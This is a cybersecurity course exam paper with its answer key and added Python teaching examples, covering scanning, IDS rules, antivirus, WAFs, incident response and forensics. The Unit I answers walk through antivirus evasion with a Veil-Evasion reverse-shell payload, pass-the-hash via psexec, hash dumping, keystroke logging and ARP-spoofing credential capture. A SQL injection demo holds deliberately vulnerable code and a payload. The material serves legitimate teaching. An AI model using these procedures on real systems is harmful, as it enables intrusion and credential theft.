CS/IT423 Hall Ticket Number:
IV/IV B.Tech (Regular) DEGREE EXAMINATION, MARCH 2017
Eighth Semester, Computer Science & Engineering
Cyber Security-II
Time: Three Hours. Maximum: 60 Marks
Answer Question No. 1 compulsorily (1 x 12 = 12 Marks). Answer ONE question from each unit (4 x 12 = 48 Marks).

1. Answer all questions (1 x 12 = 12 Marks)
a. What is the Metasploit Framework?
b. Purpose of information gathering.
c. Types of password attacks?
d. Need for a firewall?
e. Differentiate virus and worm.
f. Define e-mail spam.
g. Give some examples of incidents.
h. What is the command used for displaying currently running processes in UNIX-based systems?
i. What is the use of FTK Imager?
j. List the types of location-based data backups.
k. What is the 3-2-1 rule?
l. Define log management.

UNIT - I
2.a How to scan live hosts, active ports and types of operating systems with Zenmap. (6M)
2.b What is Veil-Evasion? Explain the procedure for bypassing Windows anti-virus with Veil-Evasion. (6M)
(OR)
3.a Discuss the procedure for compromising the target system using the pass-the-hash method. Write the purpose of keyscan. (8M)
3.b Write short notes on online password attacks with some examples. (4M)

UNIT - II
4.a State the purpose of the Snort tool. Explain the installation procedure for Snort and the parts of a rule. Write the rule for alerting on incoming ping requests from any source to any destination IP address and port. (8M)
4.b Differentiate ClamAV and ClamTk and write the commands for identifying and removing virus files using ClamAV. (4M)
(OR)
5.a What is web application security? Explain different types of web application attacks. Write the procedure for detecting SQL injection attacks using the ModSecurity tool. (8M)
5.b Explain the installation and configuration procedure for MailScanner. (4M)

UNIT - III
6.a Discuss IR methodologies based on procedures. (6M)
6.b How to investigate UNIX-based systems based on artifacts. (6M)
(OR)
7.a Why do we need FTK Imager?
Explain the procedure for creating a disk image and recovering permanently deleted files/images using FTK Imager. (6M)
7.b What is an incident and incident response? Explain the needs and goals of IR. (6M)

UNIT - IV
8.a What are the different types of storage devices? Give advantages and disadvantages. (6M)
8.b What is the need for the rsync tool? Explain the options of the rsync tool. Write the commands for copying files to local systems and remote systems. (6M)
(OR)
9.a What is a log? Explain the uses of logs and types of logs. How to install and configure the Logwatch tool on a system. (6M)
9.b Explain the log management infrastructure tiers and the functions of a log management infrastructure. (6M)

1. Answer the following
a. What is the Metasploit Framework?
Metasploit is a framework and platform for vulnerability testing and exploitation: it bundles exploit modules, payloads and auxiliary/post-exploitation modules behind one console (msfconsole).
b. Purpose of information gathering
Information gathering means collecting the details of a target environment: live hosts, open ports, running services and their versions, domains and subdomains. These details are used to choose which attacks to try against the system.
c. Types of password attacks
Passive online attacks; active online attacks; offline attacks; non-technical attacks (for example shoulder surfing and social engineering).
d. Need for a firewall
A firewall acts as the security boundary of a system or network. When a system is connected to a network, attackers can reach its services; a firewall filters the traffic allowed in and out, so only permitted connections reach the system.
e. Differentiate virus and worm
Virus: attaches itself to a host program or file and needs that host to be executed (usually by a user) in order to spread to further files.
Worm: a standalone program that self-replicates across the network without a host file or user action, typically by exploiting vulnerable network services.
f. Define e-mail spam
E-mail spam is the electronic version of junk mail: unsolicited bulk e-mail, often used to deliver phishing links and malicious attachments.
g. Give some examples of incidents
- A user is infected by downloading and running a malicious e-mail attachment.
- A gateway router is forwarding all network traffic to an attacker.
- A web server crashes due to a vast number of incoming connections from compromised clients (a DDoS).
h. What is the command used for displaying currently running processes in UNIX-based systems?
ps -elf (or ps aux) lists every process with its PID, parent PID, owning user and command line.
i. What is the use of FTK Imager?
- Used to copy a drive bit by bit into an image file (a forensic image) without altering the source.
- Used to retrieve deleted files from the image.
- Used to detect any later modification of the image by comparing its hash value (MD5/SHA1) with the one computed at acquisition time.
j. List the types of location-based data backups
Local, remote, online, offsite, cloud and FTP backups.
k. What is the 3-2-1 rule?
3: keep three copies of the data (one primary and two backups).
2: keep them on two different types of media (for example hard drive and optical media).
1: keep one copy offsite.
l. Define log management
Log management is the process of collecting, aggregating, storing and analysing log data from systems and networks for a variety of purposes (auditing, troubleshooting, incident detection and investigation).

Unit 1
2.a How to scan live hosts, active ports and types of operating system with Zenmap.
Zenmap is the GUI front end to Nmap. A scan is entered as a target plus a profile (or a raw Nmap command line), and the results are shown in five tabs.
Topology tab: an interactive view of the connections between hosts in a network. Hosts are arranged in concentric rings; each ring represents an additional network hop from the centre node. Clicking on a node brings it to the centre. Because it shows a representation of the network paths between hosts, the Topology tab benefits from the --traceroute option.
Ports / Hosts tab: its display differs depending on whether a host or a service is currently selected. When a host is selected, it shows all the interesting ports on that host, along with version information when available; when a service is selected, it lists the hosts offering that service.
Nmap Output tab: displayed by default when a scan is run. It shows the familiar Nmap terminal output, with parts of the output highlighted according to their meaning.
Host Details tab: each host has an icon that provides a very rough "vulnerability" estimate, which is based solely on the number of open ports. The icons correspond to 0-2, 3-4, 5-6, 7-8, and 9 or more open ports. The tab also shows the detected operating system (with an OS icon), uptime and the host's addresses.
OS icons: FreeBSD, IRIX, Linux, Mac OS, OpenBSD, Red Hat Linux, Solaris or OpenSolaris, Ubuntu Linux, Windows, Other (no specific icon), OS detection not performed.
Scan results tabs: each scan window contains five tabs, each displaying a different aspect of the scan results: "Nmap Output", "Ports / Hosts", "Topology", "Host Details" and "Scans".
Scan specification: Zenmap is packaged with default profiles; selecting a profile fills in the Nmap command line shown in the Command field.
Intense scan: nmap -T4 -A -v. An intense, comprehensive scan. The -A option enables OS detection (-O), version detection (-sV), script scanning (-sC) and traceroute (--traceroute). Without root privileges only version detection and script scanning are run. This is considered an intrusive scan.
Intense scan plus UDP: nmap -sS -sU -T4 -A -v. Does OS detection, version detection, script scanning and traceroute in addition to scanning TCP and UDP ports. -sS (SYN scan) and -sU (UDP scan) need root privileges.
Intense scan, all TCP ports: nmap -p 1-65535 -T4 -A -v. Scans all 65535 TCP ports instead of the default top 1000, then does OS detection, version detection, script scanning and traceroute.
Intense scan, no ping: nmap -T4 -A -v -Pn. Does an intense scan without checking to see if targets are up first. This is useful when a target seems to ignore the usual host discovery probes (for example a host firewall that drops ICMP).
Ping scan: nmap -sn. Only finds which targets are up (live hosts) and does not port scan them.
Quick scan: nmap -T4 -F. Faster than a normal scan because it uses the aggressive timing template and scans fewer ports (the 100 most common).
Quick scan plus: nmap -sV -T4 -O -F --version-light. A quick scan plus OS and version detection.
Slow comprehensive scan: nmap -sS -sU -T4 -A -v -PE -PS80,443 -PA3389 -PP -PU40125 -PY --source-port 53 --script all. A comprehensive, slow scan. Every TCP and UDP port is scanned. OS detection, version detection, script scanning and traceroute are all enabled. Many probes are sent for host discovery. This is a highly intensive scan.
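Whichever profile is used, Zenmap shows the data Nmap writes to XML (-oX). As an added example (not part of the original answer and not Nmap's or Zenmap's own code), the Python below parses a constructed nmap -oX document into the three things question 2.a asks for: live hosts, open ports with service versions, and the best OS match, and reproduces the open-port buckets behind the Host Details icon. The XML, addresses and versions are invented for the demonstration.

```python
"""Parse Nmap/Zenmap XML output (nmap -oX) into live hosts, open ports and OS guesses.

Added example: SAMPLE_XML is a constructed document in the nmap -oX format,
not a real scan result.
"""
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -T4 -A -v -oX scan.xml 192.168.56.0/24">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.56.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.2p2"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.18"/></port>
      <port protocol="tcp" portid="443"><state state="closed" reason="reset"/></port>
    </ports>
    <os><osmatch name="Linux 3.2 - 4.9" accuracy="95"/>
        <osmatch name="Linux 2.6.32" accuracy="90"/></os>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.56.102" addrtype="ipv4"/>
  </host>
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.56.103" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
        <service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open" reason="syn-ack"/>
        <service name="ms-wbt-server" product="Microsoft Terminal Services"/></port>
      <port protocol="udp" portid="137"><state state="open|filtered" reason="no-response"/>
        <service name="netbios-ns"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows 7 SP1" accuracy="98"/></os>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per live host: address, open ports, best OS match."""
    hosts = []
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # host discovery said it is down: skip it
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") in ("ipv4", "ipv6")), None)
        open_ports = []
        for port in host.findall("./ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # only definitely-open ports; open|filtered (UDP) is excluded
            svc = port.find("service")
            product = None
            if svc is not None:
                product = " ".join(p for p in (svc.get("product"), svc.get("version")) if p) or None
            open_ports.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name") if svc is not None else None,
                "product": product,
            })
        # -O produces several osmatch candidates; keep the most accurate one
        best_name, best_acc = None, -1
        for m in host.findall("./os/osmatch"):
            acc = int(m.get("accuracy", "0"))
            if acc > best_acc:
                best_name, best_acc = m.get("name"), acc
        hosts.append({"addr": addr, "ports": open_ports,
                      "os": best_name, "os_accuracy": best_acc if best_name else None})
    return hosts


def zenmap_bucket(open_port_count):
    """The five buckets behind Zenmap's host icon (based solely on open-port count)."""
    for upper, label in ((2, "0-2"), (4, "3-4"), (6, "5-6"), (8, "7-8")):
        if open_port_count <= upper:
            return label
    return "9+"


def summarise(hosts):
    """One line per live host, in the style of a quick triage report."""
    lines = []
    for h in hosts:
        ports = ",".join(f"{p['port']}/{p['proto']}" for p in h["ports"])
        lines.append(f"{h['addr']} os={h['os']} open=[{ports}] bucket={zenmap_bucket(len(h['ports']))}")
    return lines


if __name__ == "__main__":
    for line in summarise(parse_nmap_xml(SAMPLE_XML)):
        print(line)
```

Run a real scan with nmap -T4 -A -v -oX scan.xml <target> and feed the file's contents to parse_nmap_xml; UDP ports reported as open|filtered are deliberately left out, because without a response Nmap cannot tell an open UDP port from a filtered one.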
2.b What is Veil-Evasion? Explain the procedure for bypassing Windows anti-virus with Veil-Evasion.
Veil-Evasion
Anti-virus software and firewalls are used as security controls, but anti-virus can be bypassed with Veil-Evasion, a remote shell payload generator that produces executables which many anti-virus programs of the time did not detect.
Most anti-virus programs work by pattern or signature matching: if a file looks like malware the engine has been programmed to look for, it is caught. If the malicious file has a signature the AV has not seen before, many engines will dutifully report the file as clean. Veil, created by security researcher and Black Hat USA instructor Chris Truncer, exploits exactly this: it takes a standard Metasploit payload and, through a Metasploit-like console, wraps it in one of many templates (PowerShell, Python, C, Ruby and others) that are obfuscated or encrypted so that the resulting file does not match known signatures. Signature evasion alone does not defeat behavioural detection or the AMSI scanning of PowerShell that later Windows versions added, so results vary with the AV product and its version.
Veil-Evasion is installed on Kali with: apt-get install veil-evasion
Steps for bypassing anti-virus with Veil-Evasion:
i. Install Veil-Evasion: apt-get install veil-evasion
ii. Open a terminal and start veil-evasion.
iii. Pick the payload with the 'use' command; here the powershell/meterpreter/rev_tcp payload is used.
iv. Set the LHOST value (the attacker's IP address) with 'set LHOST <ip address>'.
v. Generate the payload with the 'generate' command.
vi. Give a name for the payload.
vii. Go to /var/lib/veil-evasion/output/source, copy the generated file to the target system and run it there.
How to bypass anti-virus using Veil-Evasion (lab walk-through)
a) Tools required
- VMware Workstation Pro 12.1.1
- kali-linux-2016.2-amd64 (attacker)
- Windows (any version, the target)
b) Steps
Step 1: Open a terminal and start veil-evasion.
Step 2: Pick the payload with the 'use' command; the powershell/meterpreter/rev_tcp payload is used.
Step 3: Set the LHOST value with 'set LHOST <ip address>'.
Step 4: Generate the payload with the 'generate' command.
Step 5: Give a name for the payload.
Step 6: Go to /var/lib/veil-evasion/output/source, copy the file to the target system and run it there.
Step 7: Start msfconsole to open the Metasploit Framework.
Step 8: Pick the handler with the 'use' command: use exploit/multi/handler
Step 9: Pick the matching payload: set payload windows/meterpreter/reverse_tcp
Step 10: 'show options' shows the options; set LHOST to the same address used in Veil, e.g. set LHOST 192.168.219.168 (LPORT must also match the port the payload was generated with).
Step 11: Use the command 'exploit' to start the handler; when the payload runs on the target it shows information about the new Meterpreter session.
Step 12: The command ps lists the processes of the compromised system (the equivalent of Task Manager).
Step 13: To hide the session, use the 'migrate' command; this moves Meterpreter into another process, e.g. migrate 8588 (8588 being the PID of a long-lived process chosen from the ps output).

3.a Discuss the procedure for compromising the system using the pass-the-hash method. Write the purpose of keyscan.
Pass the hash means authenticating to the target with the captured NTLM password hash directly, without cracking the hash into a plaintext password; Windows NTLM authentication only needs the hash, so the hash is as good as the password. All this is done from msfconsole with the Metasploit module exploit/windows/smb/psexec: it is given the user name and the hash retrieved with the hashdump command, plus the IP of the target system, and by doing this we get a SYSTEM shell on the target. An initial session is needed to obtain the hashes, so the procedure starts with the Veil-Evasion payload from 2.b:
- Steps 1 to 11 of 2.b: generate the powershell/meterpreter/rev_tcp payload in Veil-Evasion with the attacker's LHOST, copy it to the target and run it, and catch the connection with exploit/multi/handler (payload windows/meterpreter/reverse_tcp, set LHOST 192.168.219.168, exploit). This gives the first Meterpreter session.
- Type background to put the session in the background, then use exploit/windows/local/bypassuac, set SESSION to the backgrounded session and run exploit. In the new elevated session run getsystem, confirm with getuid, and dump the local account hashes with run post/windows/gather/hashdump.
- Background again and use exploit/windows/smb/psexec. Set RHOST to the target, SMBUser to the user name and SMBPass to the hash value (the LM:NTLM pair exactly as printed by hashdump; no cracking needed). Run exploit to obtain a new session on the target, or on any other host where the same local account and password are reused.
Purpose of keyscan
Keyscan is part of a password attack. The purpose of keyscan is to capture the keystrokes the target user types on the system: keyscan_start begins logging in the current Meterpreter session (which should be migrated into a process on the user's desktop, e.g. explorer.exe, to see their keystrokes), and keyscan_dump prints what has been captured.

3.b Write short notes on online password attacks with examples.
Passive online
In a passive online attack the attacker does not interact with the authenticating party to steal the password; in other words the password is obtained without communicating with the victim or the victim's account. Types of passive online attacks include wire sniffing, man-in-the-middle attacks and replay attacks.
Example: open a browser and download (or open) a Windows password hashing tool; enter your password in the text box and it generates the hash value for it. Then enter the hash value you retrieved into an online hash-lookup service and it gives back the plaintext password. Strictly, that lookup step is an offline (precomputed hash) attack; the passive online part is sniffing the hash or password from the network in the first place.
Active online
This type of attack can be directly termed password guessing. The attacker tries passwords one by one against the victim's account (for example with hydra or medusa against an SSH or HTTP login); it is noisy and is countered by account lockout and log monitoring.
Example of a man-in-the-middle attack with ARP spoofing using MITMf (which belongs to the passive online category above):
route -n (to find the gateway address)
mitmf -i eth0 --target <victim ip> --gateway <gateway ip> --arp --spoof --hsts
--arp --spoof poisons the victim's and gateway's ARP caches so their traffic passes through the attacker, and --hsts downgrades HTTPS so credentials can be read from the captured traffic.

Unit 2
4.a State the purpose of the Snort tool. Explain the installation procedure for Snort and the parts of a rule. Write the rule for alerting on incoming ping requests from any source to any destination IP address and port.
Purpose
Snort is an open source network intrusion detection and prevention system. Through protocol analysis, content searching and various preprocessors, Snort detects thousands of worms, vulnerability exploit attempts, port scans and other suspicious behaviour. It runs in four modes:
Sniffer mode (print packets to the console), packet logger mode (write packets to disk), network IDS mode (compare traffic against rules and alert) and inline IPS mode (additionally drop matching packets).
Installation procedure
To install Snort on Ubuntu/Debian, type the following commands in a terminal:
1) sudo apt-get update
2) sudo apt-get install snort
During installation the package asks for the interface to listen on and the HOME_NET range. Rules live in /etc/snort/rules and are included from /etc/snort/snort.conf. Check the configuration with sudo snort -T -c /etc/snort/snort.conf and run it in IDS mode with sudo snort -A console -q -c /etc/snort/snort.conf -i eth0.
In Snort a rule is divided into two parts:
1) Rule header
2) Rule options/body
The rule header identifies the traffic by the following fields, in this order:
1) Action (alert, log, pass, drop, reject, sdrop)
2) Protocol (tcp, udp, icmp or ip)
3) Source IP (an address, a CIDR block, a variable such as $EXTERNAL_NET, or any)
4) Source port (a number, a range such as 1:1024, or any)
5) Direction operator (-> for one direction, <> for both)
6) Destination IP
7) Destination port
The rule options, in parentheses and separated by semicolons, refine the match and describe the alert. The most common options are:
1) msg (the alert message)
2) sid (unique rule ID; local rules use 1000000 and above, lower IDs are reserved for the official rule sets)
3) content (a byte or string pattern to look for in the payload)
4) nocase (makes the preceding content match case-insensitive)
Rule for alerting on incoming ping requests from any source to any destination IP address and port
alert icmp any any -> any any (msg:"ICMP ping request"; itype:8; sid:1000001; rev:1;)
Without itype:8 the rule fires on every ICMP packet (echo replies, destination unreachable, ...); itype:8 restricts it to echo requests. ICMP has no ports, so both port fields must be any. Put the rule in /etc/snort/rules/local.rules, which snort.conf already includes, and validate it with snort -T.

4.b Differentiate ClamAV and ClamTk and write the commands for identifying and removing virus files from the system.
ClamAV
- ClamAV is the command-line scanner: all operations (scanning with clamscan, updating signatures with freshclam) are performed in the console.
- It has no built-in scheduler or quarantine view; those are done with cron jobs and the --move option.
ClamTk
- ClamTk is the GUI front end to ClamAV, with a rich user interface.
- It drives the same engine but adds convenience: a quarantine view, one-click signature updates and a scheduler so that scans and updates run automatically at a set time.
Command for identifying virus files (recursive scan, print only infected files):
clamscan -r -i /home/user
Command for removing the infected files found:
clamscan -r --remove /home/user
--remove deletes infected files outright. In an incident it is usually better to quarantine them for analysis with clamscan -r --move=/var/quarantine /home/user, and to run freshclam first so that the signatures are current.
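To make the header/options split concrete, here is an added example (not part of the original answer and not Snort's own code): a minimal Python matcher that parses rules in the syntax above into the seven header fields and an options dictionary, then decides whether each rule fires for a packet. The rules, addresses and packets are constructed; only the itype and flags options are evaluated, so it is a teaching aid for rule anatomy, not a substitute for Snort.

```python
"""Parse Snort rules into header and options and match them against packets.

Added example (not Snort's code): shows how the seven header fields and the
itype/flags options decide whether a rule fires. Rules and packets below are
constructed for the demonstration.
"""
import ipaddress
import re

RULES = [
    'alert icmp any any -> any any (msg:"ICMP ping request"; itype:8; sid:1000001; rev:1;)',
    'alert tcp !192.168.1.0/24 any -> 192.168.1.0/24 22 (msg:"SSH SYN from outside"; flags:S; sid:1000002; rev:1;)',
    'alert tcp any any <> 192.168.1.10 1024: (msg:"High port traffic with server"; sid:1000003; rev:1;)',
]

_HEADER = re.compile(r"^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$")
_OPTION = re.compile(r'(\w+)(?:\s*:\s*("[^"]*"|[^;]*))?\s*;')


def parse_rule(text):
    """Split a rule into the header fields and a dict of options."""
    m = _HEADER.match(text.strip())
    if not m:
        raise ValueError("not a Snort rule: " + text)
    action, proto, src, sport, op, dst, dport, body = m.groups()
    options = {}
    for name, value in _OPTION.findall(body):
        options[name] = value.strip().strip('"') if value else True  # bare options such as nocase
    return {"action": action, "proto": proto, "src": src, "sport": sport,
            "op": op, "dst": dst, "dport": dport, "options": options}


def _ip_matches(spec, addr):
    """any, a single address, a CIDR block, a [list], each optionally negated with !."""
    if spec == "any":
        return True
    negate = spec.startswith("!")
    nets = spec.lstrip("!").strip("[]").split(",")
    hit = any(ipaddress.ip_address(addr) in ipaddress.ip_network(n, strict=False) for n in nets)
    return hit != negate


def _port_matches(spec, port):
    """any, a single port, or a range such as 1:1024, 1024: or :1023, optionally negated."""
    if spec == "any":
        return True
    negate = spec.startswith("!")
    spec = spec.lstrip("!")
    if ":" in spec:
        lo, hi = spec.split(":")
        hit = (int(lo) if lo else 0) <= port <= (int(hi) if hi else 65535)
    else:
        hit = port == int(spec)
    return hit != negate


def rule_matches(rule, pkt):
    """pkt: dict with proto, src, sport, dst, dport and optional itype / flags."""
    if rule["proto"] != "ip" and rule["proto"] != pkt["proto"]:
        return False
    hit = (_ip_matches(rule["src"], pkt["src"]) and _port_matches(rule["sport"], pkt["sport"])
           and _ip_matches(rule["dst"], pkt["dst"]) and _port_matches(rule["dport"], pkt["dport"]))
    if rule["op"] == "<>":  # bidirectional: also try with the endpoints swapped
        hit = hit or (_ip_matches(rule["src"], pkt["dst"]) and _port_matches(rule["sport"], pkt["dport"])
                      and _ip_matches(rule["dst"], pkt["src"]) and _port_matches(rule["dport"], pkt["sport"]))
    if not hit:
        return False
    opts = rule["options"]
    if "itype" in opts and pkt.get("itype") != int(opts["itype"]):
        return False
    if "flags" in opts and set(opts["flags"]) != set(pkt.get("flags", "")):
        return False  # flags:S means exactly SYN; the +,* and ! modifiers are not handled here
    return True


def alerts_for(pkt, rules=RULES):
    """Return (sid, msg) for every rule that fires on the packet."""
    return [(r["options"]["sid"], r["options"]["msg"])
            for r in map(parse_rule, rules) if rule_matches(r, pkt)]


if __name__ == "__main__":
    ping = {"proto": "icmp", "src": "10.0.0.5", "sport": 0, "dst": "192.168.1.10", "dport": 0, "itype": 8}
    print(alerts_for(ping))
```

The ping rule fires for an echo request (itype 8) but not for the echo reply (itype 0) travelling back, which is the difference the itype option makes to the rule asked for in 4.a.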
5.a What is web application security? Explain different types of web application attacks. Write the procedure for detecting SQL injection attacks using the ModSecurity tool.
Web application security is the protection of web sites and web services against attacks that abuse the application's own inputs (URLs, forms, cookies, headers). ModSecurity, a web application firewall module for Apache, inspects requests and responses against a rule set and so provides web application security and intrusion protection in front of the application.
Types of web application attacks:
- SQL injection
- PHP (code/command) injection
- Error message exploitation (information disclosure through verbose errors)
- Cookie exploitation (session hijacking, cookie tampering)
- Buffer overflow
- Form exploitation (tampering with hidden fields and bypassing client-side validation)
- Web server fingerprinting
- Metacharacter and format string attacks
- Cross-site scripting (XSS) attacks
- URL redirects and directory traversal
- Identity theft
Procedure for detecting SQL injection attacks using ModSecurity (Apache on Ubuntu, with the OWASP Core Rule Set):
1) Open a terminal window and enter:
a) cd /tmp
b) sudo wget -O SpiderLabs-owasp-modsecurity-crs.tar.gz https://github.com/SpiderLabs/owasp-modsecurity-crs/tarball/v2.2.5
c) sudo tar -zxvf SpiderLabs-owasp-modsecurity-crs.tar.gz
d) sudo cp -R SpiderLabs-owasp-modsecurity-crs-*/* /etc/modsecurity/
e) sudo rm SpiderLabs-owasp-modsecurity-crs.tar.gz
f) sudo rm -R SpiderLabs-owasp-modsecurity-crs-*
g) sudo mv /etc/modsecurity/modsecurity_crs_10_setup.conf.example /etc/modsecurity/modsecurity_crs_10_setup.conf
This is the default CRS configuration file.
2) Activate the rules (the SQL injection rules are in base_rules/modsecurity_crs_41_sql_injection_attacks.conf) by linking them into the activated_rules directory:
sudo ln -s /etc/modsecurity/base_rules/*.conf /etc/modsecurity/activated_rules/
3) Now add these rules to Apache2. Open a terminal window and enter:
sudo vi /etc/apache2/mods-available/mod-security.conf
Add the following towards the end of the file, with the other Include lines, and save the file:
Include "/etc/modsecurity/activated_rules/*.conf"
4) Make sure the engine is enabled: in /etc/modsecurity/modsecurity.conf (copied from modsecurity.conf-recommended) set SecRuleEngine On (DetectionOnly logs without blocking), then sudo service apache2 restart.
5) Send a request containing an injection, e.g. http://localhost/index.php?id=1' OR '1'='1, and check /var/log/apache2/modsec_audit.log (and error.log): the matching CRS rule, its id and the message "SQL Injection Attack" identify the detection. With the engine On the request is refused with HTTP 403.

5.b Explain the installation and configuration procedure for MailScanner.
Go to the MailScanner website and its downloads page (https://www.mailscanner.info/downloads/) and download the Ubuntu/Debian version.
Before installing MailScanner, install the Postfix mail server. A mail server acts as the mail transfer agent (MTA): all incoming and outgoing mail passes through it, and MailScanner hooks into its queues to scan messages for viruses and spam.
Steps to install and configure Postfix
It is simple and straightforward. Open the terminal and type the following commands:
1) sudo apt-get update
2) sudo apt-get install postfix
After typing those commands it will automatically install Postfix. It pops up a configuration screen; the first screen contains general instructions, press OK, then choose "Internet Site" and enter the system mail name (the server's domain).
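What the CRS SQL injection rules are looking for is easier to see next to the bug they protect against. The following is an added example, not part of the original answer and not the CRS rules themselves: a login query built by string concatenation beside its parameterised fix, run against an in-memory SQLite database with constructed users, plus a deliberately tiny stand-in for the pattern matching that modsecurity_crs_41_sql_injection_attacks.conf performs with hundreds of patterns. The table, accounts and patterns are invented for the demonstration.

```python
"""Vulnerable query, parameterised fix, and a toy WAF-style SQLi detector.

Added example, not part of the original answer and not the CRS rules. Uses an
in-memory SQLite database with constructed users.
"""
import re
import sqlite3


def make_db():
    """Constructed users table for the demonstration."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "S3cret!"), ("alice", "wonderland")])
    return db


def vulnerable_login(db, username, password):
    """Builds the query by string concatenation: user input becomes SQL."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def safe_login(db, username, password):
    """Parameterised query: the driver sends values separately, never as SQL."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


# A few signatures in the spirit of the CRS SQLi rules (constructed, illustrative only).
_SQLI_PATTERNS = [
    re.compile(r"'\s*(or|and)\s*'?[^']*'?\s*=", re.I),       # ' OR '1'='1
    re.compile(r"'\s*--"),                                     # quote, then comment out the rest
    re.compile(r";\s*(drop|delete|insert|update)\b", re.I),    # stacked statement
    re.compile(r"\bunion\s+(all\s+)?select\b", re.I),          # UNION-based data extraction
]


def looks_like_sqli(value):
    """Return the first matching pattern (what a WAF would log), or None."""
    for pat in _SQLI_PATTERNS:
        if pat.search(value):
            return pat.pattern
    return None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' --"
    print("vulnerable:", vulnerable_login(db, payload, "wrong"))   # logs in as admin
    print("safe      :", safe_login(db, payload, "wrong"))         # None
    print("waf       :", looks_like_sqli(payload))                 # pattern that matched
```

The parameterised version is the real fix; the detector only reduces noise reaching a vulnerable application and, like any signature list, can be evaded by encodings and comment tricks the patterns do not cover, which is why CRS maintains hundreds of them.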
Install and configure MailScanner
To install MailScanner, go to the downloaded (extracted) folder and run the install.sh file from a terminal: sudo ./install.sh
MailScanner basic configuration for Postfix
In order to configure MailScanner follow these steps:
In the Postfix configuration file /etc/postfix/main.cf add this line:
header_checks = regexp:/etc/postfix/header_checks
In the file /etc/postfix/header_checks add this line:
/^Received:/ HOLD
This places every incoming message in Postfix's hold queue, where MailScanner picks it up; after scanning, MailScanner moves the message into the incoming queue so that Postfix delivers it.
How to set up MailScanner for use with Postfix
Open the /etc/MailScanner/MailScanner.conf file and modify the following five settings:
Run As User = postfix (run as the postfix user)
Run As Group = postfix (run as the postfix group)
Incoming Queue Dir = /var/spool/postfix/hold (where MailScanner reads the held messages)
Outgoing Queue Dir = /var/spool/postfix/incoming (where scanned messages are handed back to Postfix)
MTA = postfix (set the mail transfer agent to Postfix)
You will need to ensure that the user postfix can write to /var/spool/MailScanner/incoming and /var/spool/MailScanner/quarantine, so change their ownership:
chown postfix:postfix /var/spool/MailScanner/incoming
chown postfix:postfix /var/spool/MailScanner/quarantine
Now restart MailScanner and reload Postfix:
/etc/init.d/mailscanner restart
postfix reload
Check with mailq that messages leave the hold queue and are delivered, and look in /var/log/mail.log for MailScanner's scan results.

UNIT 3
6.a Discuss IR methodologies based on procedures.
Ans: Incident response is a coordinated and structured approach to identify and resolve an incident.
IR methodology based on procedure: phases of IR
- Pre-incident preparation
- Detection and analysis
- Containment, eradication and recovery
- Post-incident activity
Pre-incident preparation
Risk identification: the first step in the pre-incident preparation phase is to identify the risks (possible threats) associated with the organisation's business operations.
Identify critical assets: critical assets are the assets that have a major impact on business operations.
Risk criteria
- Monetary cost
- Operational impact
- Public relations fallout
- Impact on humans
Risk categories
- Break-in
- Unauthorised execution of programs or commands
- Privilege escalation
- Exploitation of CGI scripts
- Denial of service
- Web defacement
- Spoofing
Risk probabilities
- Collect data within the organisation.
- Collect data from other organisations.
- Vulnerability analysis.
Identify threats
- After identifying the critical assets, identify the possible threats to those assets.
- For example, a web server with outdated software may be attacked; a network device (router) configured with a weak password may be attacked.
Detection and analysis
- Intrusion detection system: Snort
- Detection software: Logwatch
- Reporting
Containment strategies
- Shutting down a system
- Disconnecting it from the network
- Changing the filtering rules of firewalls
- Disabling or deleting compromised accounts
- Increasing monitoring levels
- Adhering to containment procedures
- Recording all actions
Eradication
- Eliminate the cause of the incident.
- Removal software is available for most virus and worm attacks.
- Procedures are very important.
Recovery
- Return compromised systems to their normal mission status. The safest recovery procedure is to rebuild from known-good media and restore data from backups taken before the compromise.
- Record every action.
- Keep users aware of the status.
- Advise appropriate people of major developments that might affect them.
- Adhere to policy regarding media contact.
- Return logging to the normal level.
- Install patches for any exploited vulnerability.
Post-incident activity
Follow-up includes:
- Writing an incident report
- What went right or wrong in the incident response?
- How can process improvement occur?
- How much did the incident cost (in loss, handling and time)?
- Presenting the report to the relevant stakeholders

6.b How to investigate UNIX-based systems based on artifacts.
Ans: Finding the software installed on the system
By collecting the list of all installed packages we can identify software used by the attacker and responsible for the incident.
Command: dpkg --get-selections displays the list of installed packages (dpkg -l also shows their versions).
Package installation details on Debian-based systems:
/var/lib/dpkg/status contains details about the installed packages.
/var/log/dpkg.log records when each package was installed, upgraded or removed, so it gives a timeline.
Examining the running processes on the system
Command: ps -elf (look for unusual names, odd parent processes, and binaries run from /tmp or /dev/shm)
Examining the system uptime
Uptime indicates how long the system has been running since the last reboot; a recent unexplained reboot may mean a rootkit or kernel module was loaded.
Command: uptime
Command: w (also shows who is logged in and what they are running)
Examining the users' shell history
Path: /home/<username>/.bash_history (and /root/.bash_history)
Command: history
Listing the open files on the system
The operating system maintains a list of open files, which typically includes the user or process that opened each file.
Command: lsof
File system listing
Command: ls -alRu (recursive long listing showing access time instead of modification time; -c shows inode change time)
